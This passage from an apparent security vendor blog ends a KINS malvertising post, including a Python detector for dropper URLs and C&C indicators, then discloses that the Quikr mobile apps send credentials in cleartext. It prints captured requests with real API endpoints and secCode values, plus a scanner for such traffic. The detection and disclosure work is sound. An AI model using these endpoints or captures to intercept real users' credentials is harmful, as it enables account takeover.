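An added example (not from the post) that encodes the dropper URL pattern and the two post-infection network indicators above as checks over HTTP request records; the hostnames are placeholders and the query string reuses the shape of the examples in the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Dropper URL shape from the post:
#   [domain]:[nonstandard port]/[var1].php?[var2]=n&...&[var8]=n   with n a 1- to 4-digit number
DROPPER_PARAM_COUNT = 7
PARAM_NAME = re.compile(r"^[A-Za-z][\w-]*$")
PARAM_VALUE = re.compile(r"^\d{1,4}$")

# Post-infection indicators from the post.
KINS_USER_AGENT = "Mozilla/5.0 (Windows; Windows NT 7.1; en; rv:1.9.6.8) Gecko/20120122 Firefox/9.1.2"
KINS_C2_PATH = "/common/link.php"


def is_dropper_url(url):
    """True when `url` has the dropper shape: an explicit port other than 80/443, a single .php
    script at the top level, and exactly seven query parameters with 1- to 4-digit numeric values."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    try:
        port = parts.port
    except ValueError:          # non-numeric port: malformed, not the pattern
        return False
    if port is None or port in (80, 443):
        return False
    if not parts.path.endswith(".php") or parts.path.count("/") != 1:
        return False
    params = parse_qsl(parts.query, keep_blank_values=True)
    return len(params) == DROPPER_PARAM_COUNT and all(
        PARAM_NAME.match(k) and PARAM_VALUE.match(v) for k, v in params)


def classify_request(method, url, user_agent):
    """Return the KINS indicator tags that apply to one request (an empty list when none do)."""
    tags = []
    if is_dropper_url(url):
        tags.append("dropper-url-pattern")
    if method == "POST" and user_agent == KINS_USER_AGENT:
        tags.append("kins-user-agent")
    if method == "POST" and urlsplit(url).path.endswith(KINS_C2_PATH):
        tags.append("kins-c2-uri")
    return tags


def scan(requests):
    """Map every flagged URL to its indicator tags; requests are (method, url, user_agent) tuples."""
    flagged = {}
    for method, url, user_agent in requests:
        tags = classify_request(method, url, user_agent)
        if tags:
            flagged[url] = tags
    return flagged


# Constructed records: hostnames are placeholders; the query reuses the shape of the post's examples.
DROPPER_QUERY = "refer=2010&reklama=4&star=860&site-map=171&blogs=78&click=2407&honda=2707"
BROWSER_UA = "Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0"
SAMPLE_REQUESTS = [
    ("GET", "http://dropper-host.example:9090/full.php?" + DROPPER_QUERY, BROWSER_UA),
    ("GET", "http://www.example.com/full.php?" + DROPPER_QUERY, BROWSER_UA),   # standard port: no match
    ("POST", "http://c2-host.example/common/link.php", KINS_USER_AGENT),
    ("POST", "http://www.example.org/common/link.php", BROWSER_UA),
    ("GET", "http://www.example.org/common/link.php", KINS_USER_AGENT),       # GET: neither C&C check fires
]

if __name__ == "__main__":
    for url, tags in scan(SAMPLE_REQUESTS).items():
        print(url, "->", ", ".join(tags))
```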

The screenshot below shows the decrypted C&C location as well as a remote configuration file location for the bot:

Decrypted C&C locations

Here are some of the C&C server IP addresses that were contacted by the compromised systems post-infection:


Below is the C&C callback activity for January and February 2015 and the geo-location of the C&C servers:


C&C server location

Malvertising remains an effective exploit vector for threat actors to compromise victim systems. The payloads distributed through this tactic range from click-fraud botnets to highly effective crimeware that gives remote attackers complete control of the infected systems.

Friday, March 6, 2015

Mobile App Wall of Shame: Quikr


Quikr Local Classifieds

Quikr app logo 

Price : Free
Category : Lifestyle/Shopping
Platform : iOS and Android
Updated : February 12, 2015 (Android), January 22, 2015 (iOS)
Version : 7.42 (Android), 2.8.2 (iOS)
Size : 3.89 MB (Android), 10 MB (iOS)
Language : English
Vendor : Quikr India

Background:

Quikr is India's largest online and mobile classifieds portal. Like Craigslist, Quikr provides users with a platform to buy, sell, rent and advertise across multiple categories such as real estate, jobs, entertainment, education and matrimonials. Quikr also has a mobile app on both the Android and iOS platforms.


Application Chart (information retrieved from Appannie & xyo.net):

                            Android         iOS
Overall Ranking (India)     20              90
Category Ranking (India)    5 (Shopping)    8 (Lifestyle)
Total number of Downloads   12 Million      108 Thousand
Rating                      4/5             3.5/5


A user is required to provide an email address and password when creating an account. After creating an account, the user can post advertisements on Quikr. The application also provides functionality wherein different users can chat with each other.

Vulnerability - Clear text username/password

The current version of the Quikr mobile application has a serious data leakage vulnerability. It has been verified that both the current Android and iOS versions of the application send the username and password via HTTP in cleartext. This vulnerability allows an attacker on the same network to capture the credentials sent by a Quikr user to the application server and thus compromise the user's account, which may lead to fake ads being posted on the account owner's behalf, products being sold or bought, and spam messages being sent via chat to other users.

The flaw has been confirmed on version 7.42 (the latest version available on Feb 12, 2015) on the Android platform and version 2.8 (the latest version available on Jan 22, 2015) on the iOS platform.

Vulnerability in iOS version

When a user tries to register for an account in the Quikr application, an HTTP request is generated as shown below. In this request, the userid, password and mobile number of the user are sent in cleartext. 

Account Registration:

Method: POST
Url: http://services.quikr.com/api?method=registerUser&secCode=fd1f2276c71627c35e2a9c5f8838c09c&version=1.5
Host: services.quikr.com
User-Agent: Quikr/2.8.2 CFNetwork/711.1.16 Darwin/14.0.0
Request Body:cityId=23&userId=zscalerappscan%40zscaler.com&password=password123&mobile=9876543210&demail=969eac57dbfc4079a935fadf7ab261d6%40quikr.com
Server Response: AJBiY , N , .E]n3 , i^0%] , 1}qa , K;\OU4

Similarly, below is the traffic capture when an already existing user tries to login to their account. The userid and password are passed in cleartext.

Login:

Method: POST
Url: http://services.quikr.com/api?method=login&secCode=fd1f2276c71627c35e2a9c5f8838c09c&version=1.5
Host: services.quikr.com
User-Agent: Quikr/2.8.2 CFNetwork/711.1.16 Darwin/14.0.0
Request Body: demail=969eac57dbfc4079a935fadf7ab261d6@quikr.com&userId=zscalerappscan@zscaler.com&password=password123
Server Response: 1`QaL , B*RD , , ,

Vulnerability in Android version

We will first test the Quikr application installed on a Google Nexus tablet. The Quikr application version available in the Google Play store for the tablet was v6.9. Below is the sample traffic capture when a user tries to register a new Quikr account or log in to their existing Quikr account.

Account Registration:

Method: POST
Url: http://services.quikr.com/api?method=registerUser&version=1.5&secCode=zXcv80386Mdp1hs0q7o0p9uiLZV37TdF&consumerVersion=7.42&density=2.0&demail=qaf4cd1713f1f62078magnumsnip@gmail.com
Host: services.quikr.com
User-Agent: QuikrConsumer
Request Body: --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="cityId" , , 23 , --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="demail" , , qaf4cd1713f1f62078magnumsnip@gmail.com , --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="mobile" , , 8234567890 , --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="userId" , , appscan@zscaler.com , --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="opf" , , json , --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="password" , , p@ssword123
Server Response: {"login":{"auth":1,"code":"usercreated","message":[{"direct":"New user created"}],"email":"appscan@zscaler.com","mobile":"8234567890","city":"23","name":"","UserSession":"PGR8fU59OHVzOWMhfFI+fll0Qj5mdnIjRXd0Rm57T0dZPXw\/Q0RDYCE4amJ5L3R5PHVdTGpORSY6KDhjbl40LlliaztN","emailCRC":null,"cityName":"Bangalore","cityId":"23","app_notif_status":1,"sound_preference":1,"notif_alarmtime":"08:00 PM","userClassification":null,"isSharedPB":0,"isSharedFB":0,"userType":1,"numAlerts":0,"numAds":"0"}}

Login:

Method: POST
Url: http://services.quikr.com/api?method=login&version=1.5&secCode=zXcv80386Mdp1hs0q7o0p9uiLZV37TdF&consumerVersion=7.42&density=2.0&demail=qaf4cd1713f1f62078magnumsnip@gmail.com
Host: services.quikr.com
User-Agent: QuikrConsumer
Request Body: --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="demail" , , qaf4cd1713f1f62078magnumsnip@gmail.com , --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="userId" , , appscan@zscaler.com , --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="opf" , , json , --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="password" , , password123
Server Response: {"login":{"auth":1,"code":"success","message":[{"direct":"You are successfully logged in"}],"email":"appscan@zscaler.com","mobile":"8234567890","city":"23","name":"","UserSession":"PGR8fU59OHVzOWMhfFI+fll0Qj5mdnIjRXd0Rm57T0dZPXw\/Q0RDYCE4amJ5L3R5PHVdTGpORSY6KDhjbl40LlliaztN","emailCRC":null,"cityName":"Bangalore","cityId":"23","app_notif_status":1,"sound_preference":1,"notif_alarmtime":"08:00 PM","userClassification":"0","isSharedPB":0,"isSharedFB":0,"userType":1,"numAlerts":0,"numAds":"0"}}

As you can see in the above requests, all communication between the mobile app and the server is sent in cleartext, including sensitive user information.
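As an added example covering both the Shaadi.com and Quikr captures above (added here, not ZAP's code or the apps' own), the following scan takes captured requests, pulls fields out of the URL query and an urlencoded or multipart body, and reports every credential field sent over plain http://. The request records are rebuilt from the captures shown on this page, plus one constructed HTTPS control.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Field names that carry a secret or identify the account; extend these for the app under test.
CREDENTIAL_KEYS = {"password", "password1", "passwd", "pwd", "pass"}
IDENTITY_KEYS = {"email", "userid", "username", "user", "login"}

# Minimal multipart/form-data field extractor: enough for simple text parts with CRLF framing.
MULTIPART_FIELD = re.compile(r'name="([^"]+)"\r\n\r\n(.*?)\r\n', re.S)


def extract_fields(request):
    """Collect (name, value) pairs from the URL query and from the body (urlencoded or multipart)."""
    fields = parse_qsl(urlsplit(request["url"]).query, keep_blank_values=True)
    body = request.get("body", "")
    if request.get("content_type", "").startswith("multipart/form-data"):
        fields += MULTIPART_FIELD.findall(body)
    elif body:
        fields += parse_qsl(body, keep_blank_values=True)   # also decodes %40 back to @
    return fields


def find_cleartext_credentials(requests):
    """Return one finding per request that carries a credential field over plain http://."""
    findings = []
    for req in requests:
        parts = urlsplit(req["url"])
        if parts.scheme != "http":
            continue                      # TLS-protected: not readable by an on-path observer
        fields = extract_fields(req)
        secrets = {k: v for k, v in fields if k.lower() in CREDENTIAL_KEYS}
        if not secrets:
            continue
        findings.append({
            "app": req["app"],
            "method": req["method"],
            "host": parts.hostname,
            "path": parts.path,
            # Credentials in the query string also end up in proxy and server logs.
            "in_query": any(k.lower() in CREDENTIAL_KEYS for k, _ in parse_qsl(parts.query)),
            "identity": {k: v for k, v in fields if k.lower() in IDENTITY_KEYS},
            "secrets": secrets,
        })
    return findings


MP_BOUNDARY = "s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg"   # boundary seen in the Quikr capture


def multipart_body(pairs):
    """Build a multipart/form-data body with proper CRLF framing from (name, value) pairs."""
    parts = [f'--{MP_BOUNDARY}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
             for k, v in pairs]
    return "".join(parts) + f"--{MP_BOUNDARY}--\r\n"


# Request records rebuilt from the captures on this page, plus one constructed HTTPS control.
CAPTURES = [
    {"app": "Shaadi.com iOS", "method": "GET",
     "url": "http://www.shaadi.com/native-apps2/user/login?email=fnzscalerlnzscaler@gmail.com"
            "&password=p@ssword123&appver=4.1.0&os=native-iphone&deviceid=---%7C---"},
    {"app": "Shaadi.com Android", "method": "POST",
     "url": "http://www.shaadi.com/registration/user/login-submit",
     "content_type": "application/x-www-form-urlencoded",
     "body": "go=&email=vulapps%40zscaler.com&password=p%40ssword123&autologin=0&autologin=Y"},
    {"app": "Quikr iOS", "method": "POST",
     "url": "http://services.quikr.com/api?method=login&secCode=fd1f2276c71627c35e2a9c5f8838c09c&version=1.5",
     "content_type": "application/x-www-form-urlencoded",
     "body": "demail=969eac57dbfc4079a935fadf7ab261d6@quikr.com&userId=zscalerappscan@zscaler.com"
             "&password=password123"},
    {"app": "Quikr Android", "method": "POST",
     "url": "http://services.quikr.com/api?method=login&version=1.5&secCode=zXcv80386Mdp1hs0q7o0p9uiLZV37TdF"
            "&consumerVersion=7.42&density=2.0&demail=qaf4cd1713f1f62078magnumsnip@gmail.com",
     "content_type": f"multipart/form-data; boundary={MP_BOUNDARY}",
     "body": multipart_body([("demail", "qaf4cd1713f1f62078magnumsnip@gmail.com"),
                             ("userId", "appscan@zscaler.com"), ("opf", "json"),
                             ("password", "password123")])},
    {"app": "control (constructed)", "method": "POST", "url": "https://login.example/api/login",
     "content_type": "application/x-www-form-urlencoded",
     "body": "email=user%40example.com&password=hunter2"},
]

if __name__ == "__main__":
    for f in find_cleartext_credentials(CAPTURES):
        where = "URL query" if f["in_query"] else "body"
        print(f'{f["app"]}: {f["method"]} {f["host"]}{f["path"]} sends {sorted(f["secrets"])} in the {where}')
```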

ZAP Analysis:

ZAP in action - Android
ZAP in action - iOS

This flaw was identified using the Zscaler Application Profiler (ZAP). ZAP is a free online tool that can be used to analyze mobile applications for vulnerabilities and privacy issues, as seen in the above screenshots.

Conclusion:
We continue to find new popular applications in the Apple and Google app stores that leak device data and send sensitive user information in cleartext. This is a good argument for the use of one-time passwords when establishing accounts on mobile apps. As a user, you can never know with certainty whether your credentials are being transmitted or stored securely. By leveraging a password manager and ensuring that passwords are unique for all apps, you can at least be assured that if your credentials are compromised due to poor app security, only that specific account will be impacted.

Credit: Lakshmi Devi.